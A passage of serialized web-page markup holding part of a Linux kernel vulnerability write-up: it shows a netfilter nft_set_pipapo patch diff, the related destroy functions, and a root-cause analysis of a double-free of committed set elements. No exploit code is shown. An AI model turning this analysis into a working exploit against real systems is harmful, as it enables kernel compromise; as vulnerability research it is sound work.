b/net/netfilter/nft_set_pipapo.c\n",{"type":25,"tag":216,"props":54762,"children":54763},{"class":6922,"line":7110},[54764],{"type":25,"tag":216,"props":54765,"children":54766},{"style":6964},[54767],{"type":31,"value":54768},"@@ -2329,8 +2329,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n",{"type":25,"tag":216,"props":54770,"children":54771},{"class":6922,"line":7216},[54772],{"type":25,"tag":216,"props":54773,"children":54774},{"emptyLinePlaceholder":16},[54775],{"type":31,"value":7642},{"type":25,"tag":216,"props":54777,"children":54778},{"class":6922,"line":7244},[54779],{"type":25,"tag":216,"props":54780,"children":54781},{"style":6964},[54782],{"type":31,"value":54783},"        m = rcu_dereference_protected(priv->match, true);\n",{"type":25,"tag":216,"props":54785,"children":54786},{"class":6922,"line":7257},[54787],{"type":25,"tag":216,"props":54788,"children":54789},{"emptyLinePlaceholder":16},[54790],{"type":31,"value":7642},{"type":25,"tag":216,"props":54792,"children":54793},{"class":6922,"line":7275},[54794],{"type":25,"tag":216,"props":54795,"children":54796},{"style":6964},[54797],{"type":31,"value":54798},"  if (m) {\n",{"type":25,"tag":216,"props":54800,"children":54801},{"class":6922,"line":7296},[54802],{"type":25,"tag":216,"props":54803,"children":54804},{"style":6964},[54805],{"type":31,"value":54806},"   rcu_barrier();\n",{"type":25,"tag":216,"props":54808,"children":54809},{"class":6922,"line":7305},[54810],{"type":25,"tag":216,"props":54811,"children":54812},{"style":6964},[54813],{"type":31,"value":54814}," \n",{"type":25,"tag":216,"props":54816,"children":54817},{"class":6922,"line":7557},[54818],{"type":25,"tag":216,"props":54819,"children":54820},{"style":8205},[54821],{"type":31,"value":54822},"-  nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":25,"tag":216,"props":54824,"children":54825},{"class":6922,"line":7574},[54826],{"type":25,"tag":216,"props":54827,"children":54828},{"style":8205},[54829],{"type":31,"value":54830},"-\n",{"type":25,"tag":216,"props":54832,"children":54833},{"class":6922,"line":7591},[54834],{"type":25,"tag":216,"props":54835,"children":54836},{"style":6964},[54837],{"type":31,"value":54838},"   for_each_possible_cpu(cpu)\n",{"type":25,"tag":216,"props":54840,"children":54841},{"class":6922,"line":7604},[54842],{"type":25,"tag":216,"props":54843,"children":54844},{"style":6964},[54845],{"type":31,"value":54846},"    pipapo_free_scratch(m, cpu);\n",{"type":25,"tag":216,"props":54848,"children":54849},{"class":6922,"line":7613},[54850],{"type":25,"tag":216,"props":54851,"children":54852},{"style":6964},[54853],{"type":31,"value":54854},"   free_percpu(m->scratch);\n",{"type":25,"tag":216,"props":54856,"children":54857},{"class":6922,"line":7636},[54858],{"type":25,"tag":216,"props":54859,"children":54860},{"style":6964},[54861],{"type":31,"value":54862},"@@ -2342,8 +2340,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n",{"type":25,"tag":216,"props":54864,"children":54865},{"class":6922,"line":7645},[54866],{"type":25,"tag":216,"props":54867,"children":54868},{"style":6964},[54869],{"type":31,"value":54870},"  if (priv->clone) {\n",{"type":25,"tag":216,"props":54872,"children":54873},{"class":6922,"line":7654},[54874],{"type":25,"tag":216,"props":54875,"children":54876},{"style":6964},[54877],{"type":31,"value":54878},"   m = priv->clone;\n",{"type":25,"tag":216,"props":54880,"children":54881},{"class":6922,"line":7722},[54882],{"type":25,"tag":216,"props":54883,"children":54884},{"style":6964},[54885],{"type":31,"value":54814},{"type":25,"tag":216,"props":54887,"children":54888},{"class":6922,"line":7730},[54889],{"type":25,"tag":216,"props":54890,"children":54891},{"style":8205},[54892],{"type":31,"value":54893},"-  if (priv->dirty)\n",{"type":25,"tag":216,"props":54895,"children":54896},{"class":6922,"line":7760},[54897],{"type":25,"tag":216,"props":54898,"children":54899},{"style":8205},[54900],{"type":31,"value":54901},"-   nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":25,"tag":216,"props":54903,"children":54904},{"class":6922,"line":7768},[54905],{"type":25,"tag":216,"props":54906,"children":54907},{"style":6989},[54908],{"type":31,"value":54909},"+  nft_set_pipapo_match_destroy(ctx, set, m);\n",{"type":25,"tag":216,"props":54911,"children":54912},{"class":6922,"line":7800},[54913],{"type":25,"tag":216,"props":54914,"children":54915},{"style":6964},[54916],{"type":31,"value":54814},{"type":25,"tag":216,"props":54918,"children":54919},{"class":6922,"line":7808},[54920],{"type":25,"tag":216,"props":54921,"children":54922},{"style":6964},[54923],{"type":31,"value":54838},{"type":25,"tag":216,"props":54925,"children":54926},{"class":6922,"line":7868},[54927],{"type":25,"tag":216,"props":54928,"children":54929},{"style":6964},[54930],{"type":31,"value":54931},"    pipapo_free_scratch(priv->clone, cpu);\n",{"type":25,"tag":38,"props":54933,"children":54934},{},[54935,54937,54943,54944,54950,54952,54958,54960,54966,54968,54973,54975,54981,54983,54989,54991,54997],{"type":31,"value":54936},"If the ",{"type":25,"tag":82,"props":54938,"children":54940},{"className":54939},[],[54941],{"type":31,"value":54942},"priv->dirty",{"type":31,"value":1307},{"type":25,"tag":82,"props":54945,"children":54947},{"className":54946},[],[54948],{"type":31,"value":54949},"priv->clone",{"type":31,"value":54951}," variables are set, ",{"type":25,"tag":82,"props":54953,"children":54955},{"className":54954},[],[54956],{"type":31,"value":54957},"nft_set_pipapo_match_destroy()",{"type":31,"value":54959}," is called twice, once with ",{"type":25,"tag":82,"props":54961,"children":54963},{"className":54962},[],[54964],{"type":31,"value":54965},"priv->match",{"type":31,"value":54967}," as an argument, and then again with ",{"type":25,"tag":82,"props":54969,"children":54971},{"className":54970},[],[54972],{"type":31,"value":54949},{"type":31,"value":54974},". Looking at what this function does, we can see that it is iterating over the ",{"type":25,"tag":82,"props":54976,"children":54978},{"className":54977},[],[54979],{"type":31,"value":54980},"setelem",{"type":31,"value":54982},"s of the ",{"type":25,"tag":82,"props":54984,"children":54986},{"className":54985},[],[54987],{"type":31,"value":54988},"set",{"type":31,"value":54990}," and calling ",{"type":25,"tag":82,"props":54992,"children":54994},{"className":54993},[],[54995],{"type":31,"value":54996},"nf_tables_set_elem_destroy()",{"type":31,"value":54998}," for each of them.",{"type":25,"tag":206,"props":55000,"children":55002},{"className":20473,"code":55001,"language":2254,"meta":7,"style":7},"static void nft_set_pipapo_match_destroy(const struct nft_ctx *ctx,\n      const struct nft_set *set,\n      struct nft_pipapo_match *m)\n{\n struct nft_pipapo_field *f;\n int i, r;\n\n for (i = 0, f = m->f; i \u003C m->field_count - 1; i++, f++)\n  ;\n\n for (r = 0; r \u003C f->rules; r++) {\n  struct nft_pipapo_elem *e;\n\n  if (r \u003C f->rules - 1 && f->mt[r + 1].e == f->mt[r].e)\n   continue;\n\n  e = f->mt[r].e;\n\n  nf_tables_set_elem_destroy(ctx, set, &e->priv);\n }\n}\n",[55003],{"type":25,"tag":82,"props":55004,"children":55005},{"__ignoreMap":7},[55006,55053,55081,55107,55114,55135,55148,55155,55252,55260,55267,55322,55343,55350,55452,55464,55471,55507,55514,55548,55555],{"type":25,"tag":216,"props":55007,"children":55008},{"class":6922,"line":6923},[55009,55014,55019,55024,55028,55032,55036,55041,55045,55049],{"type":25,"tag":216,"props":55010,"children":55011},{"style":6936},[55012],{"type":31,"value":55013},"static",{"type":25,"tag":216,"props":55015,"children":55016},{"style":6936},[55017],{"type":31,"value":55018}," void",{"type":25,"tag":216,"props":55020,"children":55021},{"style":7047},[55022],{"type":31,"value":55023}," nft_set_pipapo_match_destroy",{"type":25,"tag":216,"props":55025,"children":55026},{"style":6964},[55027],{"type":31,"value":1850},{"type":25,"tag":216,"props":55029,"children":55030},{"style":6936},[55031],{"type":31,"value":13611},{"type":25,"tag":216,"props":55033,"children":55034},{"style":6936},[55035],{"type":31,"value":25111},{"type":25,"tag":216,"props":55037,"children":55038},{"style":6964},[55039],{"type":31,"value":55040}," nft_ctx ",{"type":25,"tag":216,"props":55042,"children":55043},{"style":6953},[55044],{"type":31,"value":8519},{"type":25,"tag":216,"props":55046,"children":55047},{"style":6947},[55048],{"type":31,"value":24240},{"type":25,"tag":216,"props":55050,"children":55051},{"style":6964},[55052],{"type":31,"value":7465},{"type":25,"tag":216,"props":55054,"children":55055},{"class":6922,"line":6769},[55056,55060,55064,55069,55073,55077],{"type":25,"tag":216,"props":55057,"children":55058},{"style":6936},[55059],{"type":31,"value":35509},{"type":25,"tag":216,"props":55061,"children":55062},{"style":6936},[55063],{"type":31,"value":25111},{"type":25,"tag":216,"props":55065,"children":55066},{"style":6964},[55067],{"type":31,"value":55068}," nft_set ",{"type":25,"tag":216,"props":55070,"children":55071},{"style":6953},[55072],{"type":31,"value":8519},{"type":25,"tag":216,"props":55074,"children":55075},{"style":6947},[55076],{"type":31,"value":54988},{"type":25,"tag":216,"props":55078,"children":55079},{"style":6964},[55080],{"type":31,"value":7465},{"type":25,"tag":216,"props":55082,"children":55083},{"class":6922,"line":6778},[55084,55089,55094,55098,55103],{"type":25,"tag":216,"props":55085,"children":55086},{"style":6936},[55087],{"type":31,"value":55088},"      struct",{"type":25,"tag":216,"props":55090,"children":55091},{"style":6964},[55092],{"type":31,"value":55093}," nft_pipapo_match ",{"type":25,"tag":216,"props":55095,"children":55096},{"style":6953},[55097],{"type":31,"value":8519},{"type":25,"tag":216,"props":55099,"children":55100},{"style":6947},[55101],{"type":31,"value":55102},"m",{"type":25,"tag":216,"props":55104,"children":55105},{"style":6964},[55106],{"type":31,"value":7107},{"type":25,"tag":216,"props":55108,"children":55109},{"class":6922,"line":7005},[55110],{"type":25,"tag":216,"props":55111,"children":55112},{"style":6964},[55113],{"type":31,"value":14836},{"type":25,"tag":216,"props":55115,"children":55116},{"class":6922,"line":7110},[55117,55121,55126,55130],{"type":25,"tag":216,"props":55118,"children":55119},{"style":6936},[55120],{"type":31,"value":25111},{"type":25,"tag":216,"props":55122,"children":55123},{"style":6964},[55124],{"type":31,"value":55125}," nft_pipapo_field ",{"type":25,"tag":216,"props":55127,"children":55128},{"style":6953},[55129],{"type":31,"value":8519},{"type":25,"tag":216,"props":55131,"children":55132},{"style":6964},[55133],{"type":31,"value":55134},"f;\n",{"type":25,"tag":216,"props":55136,"children":55137},{"class":6922,"line":7216},[55138,55143],{"type":25,"tag":216,"props":55139,"children":55140},{"style":6936},[55141],{"type":31,"value":55142}," int",{"type":25,"tag":216,"props":55144,"children":55145},{"style":6964},[55146],{"type":31,"value":55147}," i, r;\n",{"type":25,"tag":216,"props":55149,"children":55150},{"class":6922,"line":7244},[55151],{"type":25,"tag":216,"props":55152,"children":55153},{"emptyLinePlaceholder":16},[55154],{"type":31,"value":7642},{"type":25,"tag":216,"props":55156,"children":55157},{"class":6922,"line":7257},[55158,55163,55168,55172,55176,55181,55185,55190,55194,55198,55203,55207,55211,55215,55220,55225,55229,55234,55239,55244,55248],{"type":25,"tag":216,"props":55159,"children":55160},{"style":6973},[55161],{"type":31,"value":55162}," for",{"type":25,"tag":216,"props":55164,"children":55165},{"style":6964},[55166],{"type":31,"value":55167}," (i ",{"type":25,"tag":216,"props":55169,"children":55170},{"style":6953},[55171],{"type":31,"value":266},{"type":25,"tag":216,"props":55173,"children":55174},{"style":6989},[55175],{"type":31,"value":6992},{"type":25,"tag":216,"props":55177,"children":55178},{"style":6964},[55179],{"type":31,"value":55180},", f ",{"type":25,"tag":216,"props":55182,"children":55183},{"style":6953},[55184],{"type":31,"value":266},{"type":25,"tag":216,"props":55186,"children":55187},{"style":6947},[55188],{"type":31,"value":55189}," m",{"type":25,"tag":216,"props":55191,"children":55192},{"style":6964},[55193],{"type":31,"value":17714},{"type":25,"tag":216,"props":55195,"children":55196},{"style":6947},[55197],{"type":31,"value":37047},{"type":25,"tag":216,"props":55199,"children":55200},{"style":6964},[55201],{"type":31,"value":55202},"; i ",{"type":25,"tag":216,"props":55204,"children":55205},{"style":6953},[55206],{"type":31,"value":9757},{"type":25,"tag":216,"props":55208,"children":55209},{"style":6947},[55210],{"type":31,"value":55189},{"type":25,"tag":216,"props":55212,"children":55213},{"style":6964},[55214],{"type":31,"value":17714},{"type":25,"tag":216,"props":55216,"children":55217},{"style":6947},[55218],{"type":31,"value":55219},"field_count",{"type":25,"tag":216,"props":55221,"children":55222},{"style":6953},[55223],{"type":31,"value":55224}," -",{"type":25,"tag":216,"props":55226,"children":55227},{"style":6989},[55228],{"type":31,"value":8471},{"type":25,"tag":216,"props":55230,"children":55231},{"style":6964},[55232],{"type":31,"value":55233},"; i",{"type":25,"tag":216,"props":55235,"children":55236},{"style":6953},[55237],{"type":31,"value":55238},"++",{"type":25,"tag":216,"props":55240,"children":55241},{"style":6964},[55242],{"type":31,"value":55243},", f",{"type":25,"tag":216,"props":55245,"children":55246},{"style":6953},[55247],{"type":31,"value":55238},{"type":25,"tag":216,"props":55249,"children":55250},{"style":6964},[55251],{"type":31,"value":7107},{"type":25,"tag":216,"props":55253,"children":55254},{"class":6922,"line":7275},[55255],{"type":25,"tag":216,"props":55256,"children":55257},{"style":6964},[55258],{"type":31,"value":55259},"  ;\n",{"type":25,"tag":216,"props":55261,"children":55262},{"class":6922,"line":7296},[55263],{"type":25,"tag":216,"props":55264,"children":55265},{"emptyLinePlaceholder":16},[55266],{"type":31,"value":7642},{"type":25,"tag":216,"props":55268,"children":55269},{"class":6922,"line":7305},[55270,55274,55279,55283,55287,55292,55296,55300,55304,55309,55314,55318],{"type":25,"tag":216,"props":55271,"children":55272},{"style":6973},[55273],{"type":31,"value":55162},{"type":25,"tag":216,"props":55275,"children":55276},{"style":6964},[55277],{"type":31,"value":55278}," (r ",{"type":25,"tag":216,"props":55280,"children":55281},{"style":6953},[55282],{"type":31,"value":266},{"type":25,"tag":216,"props":55284,"children":55285},{"style":6989},[55286],{"type":31,"value":6992},{"type":25,"tag":216,"props":55288,"children":55289},{"style":6964},[55290],{"type":31,"value":55291},"; r ",{"type":25,"tag":216,"props":55293,"children":55294},{"style":6953},[55295],{"type":31,"value":9757},{"type":25,"tag":216,"props":55297,"children":55298},{"style":6947},[55299],{"type":31,"value":36933},{"type":25,"tag":216,"props":55301,"children":55302},{"style":6964},[55303],{"type":31,"value":17714},{"type":25,"tag":216,"props":55305,"children":55306},{"style":6947},[55307],{"type":31,"value":55308},"rules",{"type":25,"tag":216,"props":55310,"children":55311},{"style":6964},[55312],{"type":31,"value":55313},"; r",{"type":25,"tag":216,"props":55315,"children":55316},{"style":6953},[55317],{"type":31,"value":55238},{"type":25,"tag":216,"props":55319,"children":55320},{"style":6964},[55321],{"type":31,"value":18761},{"type":25,"tag":216,"props":55323,"children":55324},{"class":6922,"line":7557},[55325,55329,55334,55338],{"type":25,"tag":216,"props":55326,"children":55327},{"style":6936},[55328],{"type":31,"value":9747},{"type":25,"tag":216,"props":55330,"children":55331},{"style":6964},[55332],{"type":31,"value":55333}," nft_pipapo_elem ",{"type":25,"tag":216,"props":55335,"children":55336},{"style":6953},[55337],{"type":31,"value":8519},{"type":25,"tag":216,"props":55339,"children":55340},{"style":6964},[55341],{"type":31,"value":55342},"e;\n",{"type":25,"tag":216,"props":55344,"children":55345},{"class":6922,"line":7574},[55346],{"type":25,"tag":216,"props":55347,"children":55348},{"emptyLinePlaceholder":16},[55349],{"type":31,"value":7642},{"type":25,"tag":216,"props":55351,"children":55352},{"class":6922,"line":7591},[55353,55357,55361,55365,55369,55373,55377,55381,55385,55389,55393,55397,55402,55407,55411,55415,55419,55423,55427,55431,55435,55439,55444,55448],{"type":25,"tag":216,"props":55354,"children":55355},{"style":6973},[55356],{"type":31,"value":35356},{"type":25,"tag":216,"props":55358,"children":55359},{"style":6964},[55360],{"type":31,"value":55278},{"type":25,"tag":216,"props":55362,"children":55363},{"style":6953},[55364],{"type":31,"value":9757},{"type":25,"tag":216,"props":55366,"children":55367},{"style":6947},[55368],{"type":31,"value":36933},{"type":25,"tag":216,"props":55370,"children":55371},{"style":6964},[55372],{"type":31,"value":17714},{"type":25,"tag":216,"props":55374,"children":55375},{"style":6947},[55376],{"type":31,"value":55308},{"type":25,"tag":216,"props":55378,"children":55379},{"style":6953},[55380],{"type":31,"value":55224},{"type":25,"tag":216,"props":55382,"children":55383},{"style":6989},[55384],{"type":31,"value":8471},{"type":25,"tag":216,"props":55386,"children":55387},{"style":6953},[55388],{"type":31,"value":18142},{"type":25,"tag":216,"props":55390,"children":55391},{"style":6947},[55392],{"type":31,"value":36933},{"type":25,"tag":216,"props":55394,"children":55395},{"style":6964},[55396],{"type":31,"value":17714},{"type":25,"tag":216,"props":55398,"children":55399},{"style":6947},[55400],{"type":31,"value":55401},"mt",{"type":25,"tag":216,"props":55403,"children":55404},{"style":6964},[55405],{"type":31,"value":55406},"[r ",{"type":25,"tag":216,"props":55408,"children":55409},{"style":6953},[55410],{"type":31,"value":3539},{"type":25,"tag":216,"props":55412,"children":55413},{"style":6989},[55414],{"type":31,"value":8471},{"type":25,"tag":216,"props":55416,"children":55417},{"style":6964},[55418],{"type":31,"value":54317},{"type":25,"tag":216,"props":55420,"children":55421},{"style":6947},[55422],{"type":31,"value":2399},{"type":25,"tag":216,"props":55424,"children":55425},{"style":6953},[55426],{"type":31,"value":7232},{"type":25,"tag":216,"props":55428,"children":55429},{"style":6947},[55430],{"type":31,"value":36933},{"type":25,"tag":216,"props":55432,"children":55433},{"style":6964},[55434],{"type":31,"value":17714},{"type":25,"tag":216,"props":55436,"children":55437},{"style":6947},[55438],{"type":31,"value":55401},{"type":25,"tag":216,"props":55440,"children":55441},{"style":6964},[55442],{"type":31,"value":55443},"[r].",{"type":25,"tag":216,"props":55445,"children":55446},{"style":6947},[55447],{"type":31,"value":2399},{"type":25,"tag":216,"props":55449,"children":55450},{"style":6964},[55451],{"type":31,"value":7107},{"type":25,"tag":216,"props":55453,"children":55454},{"class":6922,"line":7604},[55455,55460],{"type":25,"tag":216,"props":55456,"children":55457},{"style":6973},[55458],{"type":31,"value":55459},"   continue",{"type":25,"tag":216,"props":55461,"children":55462},{"style":6964},[55463],{"type":31,"value":6967},{"type":25,"tag":216,"props":55465,"children":55466},{"class":6922,"line":7613},[55467],{"type":25,"tag":216,"props":55468,"children":55469},{"emptyLinePlaceholder":16},[55470],{"type":31,"value":7642},{"type":25,"tag":216,"props":55472,"children":55473},{"class":6922,"line":7636},[55474,55479,55483,55487,55491,55495,55499,55503],{"type":25,"tag":216,"props":55475,"children":55476},{"style":6964},[55477],{"type":31,"value":55478},"  e ",{"type":25,"tag":216,"props":55480,"children":55481},{"style":6953},[55482],{"type":31,"value":266},{"type":25,"tag":216,"props":55484,"children":55485},{"style":6947},[55486],{"type":31,"value":36933},{"type":25,"tag":216,"props":55488,"children":55489},{"style":6964},[55490],{"type":31,"value":17714},{"type":25,"tag":216,"props":55492,"children":55493},{"style":6947},[55494],{"type":31,"value":55401},{"type":25,"tag":216,"props":55496,"children":55497},{"style":6964},[55498],{"type":31,"value":55443},{"type":25,"tag":216,"props":55500,"children":55501},{"style":6947},[55502],{"type":31,"value":2399},{"type":25,"tag":216,"props":55504,"children":55505},{"style":6964},[55506],{"type":31,"value":6967},{"type":25,"tag":216,"props":55508,"children":55509},{"class":6922,"line":7645},[55510],{"type":25,"tag":216,"props":55511,"children":55512},{"emptyLinePlaceholder":16},[55513],{"type":31,"value":7642},{"type":25,"tag":216,"props":55515,"children":55516},{"class":6922,"line":7654},[55517,55522,55527,55531,55535,55539,55544],{"type":25,"tag":216,"props":55518,"children":55519},{"style":7047},[55520],{"type":31,"value":55521},"  nf_tables_set_elem_destroy",{"type":25,"tag":216,"props":55523,"children":55524},{"style":6964},[55525],{"type":31,"value":55526},"(ctx, set, ",{"type":25,"tag":216,"props":55528,"children":55529},{"style":6953},[55530],{"type":31,"value":7059},{"type":25,"tag":216,"props":55532,"children":55533},{"style":6947},[55534],{"type":31,"value":2399},{"type":25,"tag":216,"props":55536,"children":55537},{"style":6964},[55538],{"type":31,"value":17714},{"type":25,"tag":216,"props":55540,"children":55541},{"style":6947},[55542],{"type":31,"value":55543},"priv",{"type":25,"tag":216,"props":55545,"children":55546},{"style":6964},[55547],{"type":31,"value":7797},{"type":25,"tag":216,"props":55549,"children":55550},{"class":6922,"line":7722},[55551],{"type":25,"tag":216,"props":55552,"children":55553},{"style":6964},[55554],{"type":31,"value":13552},{"type":25,"tag":216,"props":55556,"children":55557},{"class":6922,"line":7730},[55558],{"type":25,"tag":216,"props":55559,"children":55560},{"style":6964},[55561],{"type":31,"value":7874},{"type":25,"tag":38,"props":55563,"children":55564},{},[55565,55567,55573,55575,55580],{"type":31,"value":55566},"Which will then ",{"type":25,"tag":82,"props":55568,"children":55570},{"className":55569},[],[55571],{"type":31,"value":55572},"kfree()",{"type":31,"value":55574}," the ",{"type":25,"tag":82,"props":55576,"children":55578},{"className":55577},[],[55579],{"type":31,"value":54980},{"type":31,"value":179},{"type":25,"tag":206,"props":55582,"children":55584},{"className":20473,"code":55583,"language":2254,"meta":7,"style":7},"void nf_tables_set_elem_destroy(const struct nft_ctx *ctx,\n    const struct nft_set *set,\n    const struct nft_elem_priv *elem_priv)\n{\n struct nft_set_ext *ext = nft_set_elem_ext(set, elem_priv);\n\n if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPRESSIONS))\n  nft_set_elem_expr_destroy(ctx, nft_set_ext_expr(ext));\n\n kfree(elem_priv);\n}\n",[55585],{"type":25,"tag":82,"props":55586,"children":55587},{"__ignoreMap":7},[55588,55629,55657,55686,55693,55728,55735,55756,55779,55786,55799],{"type":25,"tag":216,"props":55589,"children":55590},{"class":6922,"line":6923},[55591,55596,55601,55605,55609,55613,55617,55621,55625],{"type":25,"tag":216,"props":55592,"children":55593},{"style":6936},[55594],{"type":31,"value":55595},"void",{"type":25,"tag":216,"props":55597,"children":55598},{"style":7047},[55599],{"type":31,"value":55600}," nf_tables_set_elem_destroy",{"type":25,"tag":216,"props":55602,"children":55603},{"style":6964},[55604],{"type":31,"value":1850},{"type":25,"tag":216,"props":55606,"children":55607},{"style":6936},[55608],{"type":31,"value":13611},{"type":25,"tag":216,"props":55610,"children":55611},{"style":6936},[55612],{"type":31,"value":25111},{"type":25,"tag":216,"props":55614,"children":55615},{"style":6964},[55616],{"type":31,"value":55040},{"type":25,"tag":216,"props":55618,"children":55619},{"style":6953},[55620],{"type":31,"value":8519},{"type":25,"tag":216,"props":55622,"children":55623},{"style":6947},[55624],{"type":31,"value":24240},{"type":25,"tag":216,"props":55626,"children":55627},{"style":6964},[55628],{"type":31,"value":7465},{"type":25,"tag":216,"props":55630,"children":55631},{"class":6922,"line":6769},[55632,55637,55641,55645,55649,55653],{"type":25,"tag":216,"props":55633,"children":55634},{"style":6936},[55635],{"type":31,"value":55636},"    const",{"type":25,"tag":216,"props":55638,"children":55639},{"style":6936},[55640],{"type":31,"value":25111},{"type":25,"tag":216,"props":55642,"children":55643},{"style":6964},[55644],{"type":31,"value":55068},{"type":25,"tag":216,"props":55646,"children":55647},{"style":6953},[55648],{"type":31,"value":8519},{"type":25,"tag":216,"props":55650,"children":55651},{"style":6947},[55652],{"type":31,"value":54988},{"type":25,"tag":216,"props":55654,"children":55655},{"style":6964},[55656],{"type":31,"value":7465},{"type":25,"tag":216,"props":55658,"children":55659},{"class":6922,"line":6778},[55660,55664,55668,55673,55677,55682],{"type":25,"tag":216,"props":55661,"children":55662},{"style":6936},[55663],{"type":31,"value":55636},{"type":25,"tag":216,"props":55665,"children":55666},{"style":6936},[55667],{"type":31,"value":25111},{"type":25,"tag":216,"props":55669,"children":55670},{"style":6964},[55671],{"type":31,"value":55672}," nft_elem_priv ",{"type":25,"tag":216,"props":55674,"children":55675},{"style":6953},[55676],{"type":31,"value":8519},{"type":25,"tag":216,"props":55678,"children":55679},{"style":6947},[55680],{"type":31,"value":55681},"elem_priv",{"type":25,"tag":216,"props":55683,"children":55684},{"style":6964},[55685],{"type":31,"value":7107},{"type":25,"tag":216,"props":55687,"children":55688},{"class":6922,"line":7005},[55689],{"type":25,"tag":216,"props":55690,"children":55691},{"style":6964},[55692],{"type":31,"value":14836},{"type":25,"tag":216,"props":55694,"children":55695},{"class":6922,"line":7110},[55696,55700,55705,55709,55714,55718,55723],{"type":25,"tag":216,"props":55697,"children":55698},{"style":6936},[55699],{"type":31,"value":25111},{"type":25,"tag":216,"props":55701,"children":55702},{"style":6964},[55703],{"type":31,"value":55704}," nft_set_ext ",{"type":25,"tag":216,"props":55706,"children":55707},{"style":6953},[55708],{"type":31,"value":8519},{"type":25,"tag":216,"props":55710,"children":55711},{"style":6964},[55712],{"type":31,"value":55713},"ext ",{"type":25,"tag":216,"props":55715,"children":55716},{"style":6953},[55717],{"type":31,"value":266},{"type":25,"tag":216,"props":55719,"children":55720},{"style":7047},[55721],{"type":31,"value":55722}," nft_set_elem_ext",{"type":25,"tag":216,"props":55724,"children":55725},{"style":6964},[55726],{"type":31,"value":55727},"(set, elem_priv);\n",{"type":25,"tag":216,"props":55729,"children":55730},{"class":6922,"line":7216},[55731],{"type":25,"tag":216,"props":55732,"children":55733},{"emptyLinePlaceholder":16},[55734],{"type":31,"value":7642},{"type":25,"tag":216,"props":55736,"children":55737},{"class":6922,"line":7244},[55738,55742,55746,55751],{"type":25,"tag":216,"props":55739,"children":55740},{"style":6973},[55741],{"type":31,"value":19746},{"type":25,"tag":216,"props":55743,"children":55744},{"style":6964},[55745],{"type":31,"value":7016},{"type":25,"tag":216,"props":55747,"children":55748},{"style":7047},[55749],{"type":31,"value":55750},"nft_set_ext_exists",{"type":25,"tag":216,"props":55752,"children":55753},{"style":6964},[55754],{"type":31,"value":55755},"(ext, NFT_SET_EXT_EXPRESSIONS))\n",{"type":25,"tag":216,"props":55757,"children":55758},{"class":6922,"line":7257},[55759,55764,55769,55774],{"type":25,"tag":216,"props":55760,"children":55761},{"style":7047},[55762],{"type":31,"value":55763},"  nft_set_elem_expr_destroy",{"type":25,"tag":216,"props":55765,"children":55766},{"style":6964},[55767],{"type":31,"value":55768},"(ctx, ",{"type":25,"tag":216,"props":55770,"children":55771},{"style":7047},[55772],{"type":31,"value":55773},"nft_set_ext_expr",{"type":25,"tag":216,"props":55775,"children":55776},{"style":6964},[55777],{"type":31,"value":55778},"(ext));\n",{"type":25,"tag":216,"props":55780,"children":55781},{"class":6922,"line":7275},[55782],{"type":25,"tag":216,"props":55783,"children":55784},{"emptyLinePlaceholder":16},[55785],{"type":31,"value":7642},{"type":25,"tag":216,"props":55787,"children":55788},{"class":6922,"line":7296},[55789,55794],{"type":25,"tag":216,"props":55790,"children":55791},{"style":7047},[55792],{"type":31,"value":55793}," kfree",{"type":25,"tag":216,"props":55795,"children":55796},{"style":6964},[55797],{"type":31,"value":55798},"(elem_priv);\n",{"type":25,"tag":216,"props":55800,"children":55801},{"class":6922,"line":7305},[55802],{"type":25,"tag":216,"props":55803,"children":55804},{"style":6964},[55805],{"type":31,"value":7874},{"type":25,"tag":38,"props":55807,"children":55808},{},[55809,55810,55816,55818,55823,55825,55830,55832,55837,55838,55843,55845,55850,55852,55857,55859,55864],{"type":31,"value":474},{"type":25,"tag":82,"props":55811,"children":55813},{"className":55812},[],[55814],{"type":31,"value":55815},"nft_pipapo_match",{"type":31,"value":55817}," objects contain views of the ",{"type":25,"tag":82,"props":55819,"children":55821},{"className":55820},[],[55822],{"type":31,"value":54980},{"type":31,"value":55824},"'s of a ",{"type":25,"tag":82,"props":55826,"children":55828},{"className":55827},[],[55829],{"type":31,"value":54988},{"type":31,"value":55831},". The difference between the ",{"type":25,"tag":82,"props":55833,"children":55835},{"className":55834},[],[55836],{"type":31,"value":54965},{"type":31,"value":1307},{"type":25,"tag":82,"props":55839,"children":55841},{"className":55840},[],[55842],{"type":31,"value":54949},{"type":31,"value":55844}," match objects is that the clone has a view of not only already committed ",{"type":25,"tag":82,"props":55846,"children":55848},{"className":55847},[],[55849],{"type":31,"value":54980},{"type":31,"value":55851},"'s that the \"normal\" one has but also a view of the ",{"type":25,"tag":82,"props":55853,"children":55855},{"className":55854},[],[55856],{"type":31,"value":54980},{"type":31,"value":55858},"'s that was still not committed that only exists in the current control-plane. In other words, the control plane makes changes to the clone, and if the commit path is reached, the changes are committed to ",{"type":25,"tag":82,"props":55860,"children":55862},{"className":55861},[],[55863],{"type":31,"value":54965},{"type":31,"value":179},{"type":25,"tag":606,"props":55866,"children":55868},{"id":55867},"root-cause-analysis",[55869],{"type":31,"value":55870},"Root-cause analysis",{"type":25,"tag":38,"props":55872,"children":55873},{},[55874,55876,55882,55884,55889],{"type":31,"value":55875},"So ",{"type":25,"tag":82,"props":55877,"children":55879},{"className":55878},[],[55880],{"type":31,"value":55881},"nf_tables_set_elem_destroy",{"type":31,"value":55883}," being called for both match objects seems like a pretty straightforward double-free of the ",{"type":25,"tag":82,"props":55885,"children":55887},{"className":55886},[],[55888],{"type":31,"value":54980},{"type":31,"value":55890},"s that had already been committed since those will have duplicated views. At first glance, this is some bizarre-looking code. How did this bug come to be? How was it not detected before? Let's try to get to the bottom of it.",{"type":25,"tag":38,"props":55892,"children":55893},{},[55894,55896,55901,55903,55908,55910,55915,55917,55922,55924,55929],{"type":31,"value":55895},"We should now try to understand how to reach that path with the ",{"type":25,"tag":82,"props":55897,"children":55899},{"className":55898},[],[55900],{"type":31,"value":54942},{"type":31,"value":55902}," flag set, which is a member of the private data of a pipapo ",{"type":25,"tag":82,"props":55904,"children":55906},{"className":55905},[],[55907],{"type":31,"value":54980},{"type":31,"value":55909}," that becomes true whenever a change is made to the ",{"type":25,"tag":82,"props":55911,"children":55913},{"className":55912},[],[55914],{"type":31,"value":54988},{"type":31,"value":55916}," during the control-plane pass of a transaction. This is to tell the commit path that this ",{"type":25,"tag":82,"props":55918,"children":55920},{"className":55919},[],[55921],{"type":31,"value":54988},{"type":31,"value":55923}," has changes that have to be committed. If we refer to the code, we see that we can make 